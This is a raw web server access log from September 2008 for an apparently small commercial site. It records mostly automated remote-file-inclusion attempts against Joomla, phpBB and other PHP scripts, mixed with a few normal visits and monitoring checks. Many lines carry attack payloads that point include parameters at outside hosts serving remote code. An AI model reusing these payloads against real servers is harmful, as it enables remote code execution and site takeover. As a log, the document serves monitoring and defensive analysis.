213.165.80.16 - - [10/Sep/2008:00:00:09 -0400] "GET /logs/index.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
213.165.80.16 - - [10/Sep/2008:00:00:09 -0400] "GET /index.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
74.6.17.183 - - [10/Sep/2008:00:02:00 -0400] "GET /logs/error_log.Q108013100 HTTP/1.0" 200 100507 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [10/Sep/2008:00:03:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.90.127.34 - - [10/Sep/2008:00:03:31 -0400] "GET /logs/access_log.Q108081500//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
80.90.127.34 - - [10/Sep/2008:00:03:31 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
80.90.127.34 - - [10/Sep/2008:00:03:33 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
216.55.133.16 - - [10/Sep/2008:00:03:48 -0400] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
80.90.127.34 - - [10/Sep/2008:00:04:20 -0400] "GET /logs/access_log.Q108082300//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
216.55.133.16 - - [10/Sep/2008:00:05:05 -0400] "GET /logs/error_log.Q108073100//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
216.55.133.16 - - [10/Sep/2008:00:05:06 -0400] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
216.55.133.16 - - [10/Sep/2008:00:05:06 -0400] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
216.55.133.16 - - [10/Sep/2008:00:05:24 -0400] "GET /logs/error_log.Q108080700//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
213.156.62.144 - - [10/Sep/2008:00:05:37 -0400] "GET /logs/error_log.Q108053100/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
81.177.8.135 - - [10/Sep/2008:00:06:14 -0400] "GET /logs/error_log.Q108052900//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://purearcade.com/bodo.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.812"
81.177.8.135 - - [10/Sep/2008:00:06:14 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://purearcade.com/bodo.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.812"
81.177.8.135 - - [10/Sep/2008:00:06:14 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://purearcade.com/bodo.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.812"
216.104.34.78 - - [10/Sep/2008:00:07:19 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.shebaronin.ru/tiki/backups/id.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.812"
216.104.34.78 - - [10/Sep/2008:00:07:19 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://www.shebaronin.ru/tiki/backups/id.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.812"
216.104.34.78 - - [10/Sep/2008:00:07:19 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.shebaronin.ru/tiki/backups/id.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.812"
200.49.100.20 - - [10/Sep/2008:00:07:29 -0400] "GET /logs/access_log.Q108081500//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
200.49.100.20 - - [10/Sep/2008:00:07:29 -0400] "GET /logs/access_log.Q108081500//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 260 "-" "libwww-perl/5.69"
200.49.100.20 - - [10/Sep/2008:00:07:29 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
200.49.100.20 - - [10/Sep/2008:00:07:29 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 233 "-" "libwww-perl/5.69"
200.49.100.20 - - [10/Sep/2008:00:07:29 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 238 "-" "libwww-perl/5.69"
216.104.34.78 - - [10/Sep/2008:00:07:30 -0400] "GET /logs/access_log.Q108072300//index.php?DOCUMENT_ROOT=http://www.shebaronin.ru/tiki/backups/id.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.812"
195.39.5.203 - - [10/Sep/2008:00:07:33 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
195.39.5.203 - - [10/Sep/2008:00:07:33 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
195.39.5.203 - - [10/Sep/2008:00:07:34 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
195.39.5.203 - - [10/Sep/2008:00:07:42 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
195.39.5.203 - - [10/Sep/2008:00:07:43 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
195.39.5.203 - - [10/Sep/2008:00:07:44 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
195.19.6.245 - - [10/Sep/2008:00:08:15 -0400] "GET /logs/access_log.Q108060200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 283 "-" "libwww-perl/5.69"
195.19.6.245 - - [10/Sep/2008:00:08:16 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.69"
195.19.6.245 - - [10/Sep/2008:00:08:16 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 261 "-" "libwww-perl/5.69"
195.19.6.245 - - [10/Sep/2008:00:08:21 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 283 "-" "libwww-perl/5.69"
209.59.12.99 - - [10/Sep/2008:00:08:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.39.5.203 - - [10/Sep/2008:00:08:34 -0400] "GET /logs/error_log.Q108081100//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
195.39.5.203 - - [10/Sep/2008:00:08:42 -0400] "GET /logs/error_log.Q108081100//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
200.49.100.20 - - [10/Sep/2008:00:08:57 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 233 "-" "libwww-perl/5.69"
61.11.80.220 - - [10/Sep/2008:00:09:10 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
61.11.80.220 - - [10/Sep/2008:00:09:10 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
200.49.100.20 - - [10/Sep/2008:00:09:57 -0400] "GET /logs/access_log.Q108082300//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 260 "-" "libwww-perl/5.69"
83.64.132.254 - - [10/Sep/2008:00:10:03 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.severo-zapad.ru/i/Admin/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.76"
83.64.132.254 - - [10/Sep/2008:00:10:03 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.severo-zapad.ru/i/Admin/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.76"
83.64.132.254 - - [10/Sep/2008:00:10:03 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://www.severo-zapad.ru/i/Admin/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
83.64.132.254 - - [10/Sep/2008:00:10:09 -0400] "GET /logs/access_log.Q108072300//index.php?DOCUMENT_ROOT=http://www.severo-zapad.ru/i/Admin/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.76"
200.49.100.20 - - [10/Sep/2008:00:10:21 -0400] "GET /logs/access_log.Q108081200//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.thebadst.com/wing.jpg?? HTTP/1.1" 404 251 "-" "libwww-perl/5.69"
85.17.6.7 - - [10/Sep/2008:00:10:34 -0400] "GET /logs/error_log.Q108022900//popup.php?url_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
85.17.6.7 - - [10/Sep/2008:00:10:34 -0400] "GET //popup.php?url_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
85.17.6.7 - - [10/Sep/2008:00:10:35 -0400] "GET /logs//popup.php?url_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
85.17.6.7 - - [10/Sep/2008:00:10:35 -0400] "GET /logs/error_log.Q108022900//popup.php?path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
85.17.6.7 - - [10/Sep/2008:00:10:35 -0400] "GET //popup.php?path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
85.17.6.7 - - [10/Sep/2008:00:10:36 -0400] "GET /logs//popup.php?path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
64.91.254.83 - - [10/Sep/2008:00:11:49 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://juninhor0x.t35.com/idr0x.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.812"
64.91.254.83 - - [10/Sep/2008:00:11:49 -0400] "GET /logs/access_log.Q108081100/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://juninhor0x.t35.com/idr0x.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.812"
64.91.254.83 - - [10/Sep/2008:00:11:50 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://juninhor0x.t35.com/idr0x.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.812"
61.11.80.220 - - [10/Sep/2008:00:12:08 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
61.11.80.220 - - [10/Sep/2008:00:12:17 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GoogleT5)"
61.11.80.220 - - [10/Sep/2008:00:12:18 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GoogleT5)"
61.11.80.220 - - [10/Sep/2008:00:12:26 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GoogleT5)"
61.11.80.220 - - [10/Sep/2008:00:12:26 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GoogleT5)"
64.91.254.83 - - [10/Sep/2008:00:12:31 -0400] "GET /logs/error_log.Q108082300/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://juninhor0x.t35.com/idr0x.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.812"
61.11.80.220 - - [10/Sep/2008:00:12:42 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 75294 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GoogleT5)"
209.59.12.99 - - [10/Sep/2008:00:13:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.250.238.63 - - [10/Sep/2008:00:14:28 -0400] "GET /logs/error_log.Q108022900//popup.php?url_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
209.250.238.63 - - [10/Sep/2008:00:14:28 -0400] "GET //popup.php?url_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
209.250.238.63 - - [10/Sep/2008:00:14:28 -0400] "GET /logs//popup.php?url_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
209.250.238.63 - - [10/Sep/2008:00:14:43 -0400] "GET /logs/error_log.Q108022900//popup.php?path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.813"
209.250.238.63 - - [10/Sep/2008:00:14:43 -0400] "GET //popup.php?path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
209.250.238.63 - - [10/Sep/2008:00:14:43 -0400] "GET /logs//popup.php?path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
216.139.67.20 - - [10/Sep/2008:00:15:07 -0400] "GET /logs/error_log.Q108090200/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 274 "-" "libwww-perl/5.64"
216.139.67.20 - - [10/Sep/2008:00:15:07 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 248 "-" "libwww-perl/5.64"
216.139.67.20 - - [10/Sep/2008:00:15:07 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 253 "-" "libwww-perl/5.64"
216.139.67.20 - - [10/Sep/2008:00:15:09 -0400] "GET /logs/error_log.Q108090200/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 273 "-" "libwww-perl/5.64"
216.139.67.20 - - [10/Sep/2008:00:15:09 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 247 "-" "libwww-perl/5.64"
216.139.67.20 - - [10/Sep/2008:00:15:09 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 252 "-" "libwww-perl/5.64"
82.98.141.70 - - [10/Sep/2008:00:15:14 -0400] "GET /fclick/show.php?path=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 213 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
82.98.141.70 - - [10/Sep/2008:00:15:15 -0400] "GET /logs/fclick/show.php?path=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 218 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
208.226.79.133 - - [10/Sep/2008:00:15:15 -0400] "GET /logs/error_log.Q108081800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 284 "-" "libwww-perl/5.803"
208.226.79.133 - - [10/Sep/2008:00:15:15 -0400] "GET /logs/error_log.Q108081800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 284 "-" "libwww-perl/5.803"
77.221.130.3 - - [10/Sep/2008:00:15:42 -0400] "GET /logs/error_log.Q108022900//popup.php?path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
77.221.130.3 - - [10/Sep/2008:00:15:42 -0400] "GET //popup.php?path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
77.221.130.3 - - [10/Sep/2008:00:15:42 -0400] "GET /logs/error_log.Q108022900//popup.php?url_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
77.221.130.3 - - [10/Sep/2008:00:15:42 -0400] "GET /logs//popup.php?path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
77.221.130.3 - - [10/Sep/2008:00:15:42 -0400] "GET //popup.php?url_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
77.221.130.3 - - [10/Sep/2008:00:15:43 -0400] "GET /logs//popup.php?url_path=http://www.ww-lab.com/neotalk/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
195.19.6.245 - - [10/Sep/2008:00:15:45 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.69"
143.225.81.253 - - [10/Sep/2008:00:16:42 -0400] "GET /logs/error_log.Q108090200/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
143.225.81.253 - - [10/Sep/2008:00:16:43 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
143.225.81.253 - - [10/Sep/2008:00:16:43 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
143.225.81.253 - - [10/Sep/2008:00:16:47 -0400] "GET /logs/error_log.Q108090200/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
143.225.81.253 - - [10/Sep/2008:00:16:47 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
143.225.81.253 - - [10/Sep/2008:00:16:47 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
96.252.139.75 - - [10/Sep/2008:00:16:59 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13"
96.252.139.75 - - [10/Sep/2008:00:16:59 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13"
213.156.62.144 - - [10/Sep/2008:00:17:53 -0400] "GET /logs/error_log.Q108070800//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
213.156.62.144 - - [10/Sep/2008:00:17:53 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
213.156.62.144 - - [10/Sep/2008:00:17:54 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
85.186.255.184 - - [10/Sep/2008:00:17:56 -0400] "GET /logs/error_log.Q108090200/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
85.186.255.184 - - [10/Sep/2008:00:17:56 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
85.186.255.184 - - [10/Sep/2008:00:17:57 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
85.186.255.184 - - [10/Sep/2008:00:18:01 -0400] "GET /logs/error_log.Q108090200/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
85.186.255.184 - - [10/Sep/2008:00:18:02 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
85.186.255.184 - - [10/Sep/2008:00:18:02 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
190.83.18.253 - - [10/Sep/2008:00:18:20 -0400] "GET //menu.php?nazev=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
190.83.18.253 - - [10/Sep/2008:00:18:20 -0400] "GET /logs/error_log.Q108040200//menu.php?nazev=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
190.83.18.253 - - [10/Sep/2008:00:18:21 -0400] "GET /logs//menu.php?nazev=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
213.156.62.144 - - [10/Sep/2008:00:18:31 -0400] "GET /logs/error_log.Q108062100//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
209.59.12.99 - - [10/Sep/2008:00:18:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
131.173.17.81 - - [10/Sep/2008:00:18:46 -0400] "GET /logs/error_log.Q108070800//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
131.173.17.81 - - [10/Sep/2008:00:18:46 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
131.173.17.81 - - [10/Sep/2008:00:18:46 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
85.214.21.28 - - [10/Sep/2008:00:19:00 -0400] "GET /logs/access_log.Q108081600/!rfihttp://miraquetvo.com/admin/readme.txt???? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
85.214.21.28 - - [10/Sep/2008:00:19:00 -0400] "GET /logs/!rfihttp://miraquetvo.com/admin/readme.txt???? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
85.214.21.28 - - [10/Sep/2008:00:19:01 -0400] "GET /!rfihttp://miraquetvo.com/admin/readme.txt???? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
85.214.21.28 - - [10/Sep/2008:00:19:04 -0400] "GET /logs/error_log.Q108051800/!rfihttp://miraquetvo.com/admin/readme.txt???? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
190.83.18.253 - - [10/Sep/2008:00:19:04 -0400] "GET /logs/error_log.Q108040200//menu.php?nazev=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
190.83.18.253 - - [10/Sep/2008:00:19:05 -0400] "GET //menu.php?nazev=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
190.83.18.253 - - [10/Sep/2008:00:19:05 -0400] "GET /logs//menu.php?nazev=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
131.173.17.81 - - [10/Sep/2008:00:19:10 -0400] "GET /logs/access_log.Q108070800//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.pratic-appel.fr/Css/TT?? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
85.214.21.28 - - [10/Sep/2008:00:19:12 -0400] "GET /logs/access_log.Q108081600%20/!rfihttp://miraquetvo.com/admin/readme.txt???? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
85.214.21.28 - - [10/Sep/2008:00:19:17 -0400] "GET /logs/access_log.Q108081900/!rfihttp://miraquetvo.com/admin/readme.txt???? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
208.69.127.188 - - [10/Sep/2008:00:19:23 -0400] "GET /logs/access_log.Q108081900//oneadmin/config.php?path[docroot]=http://www.trosken.com/id.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
208.69.127.188 - - [10/Sep/2008:00:19:23 -0400] "GET //oneadmin/config.php?path[docroot]=http://www.trosken.com/id.txt? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
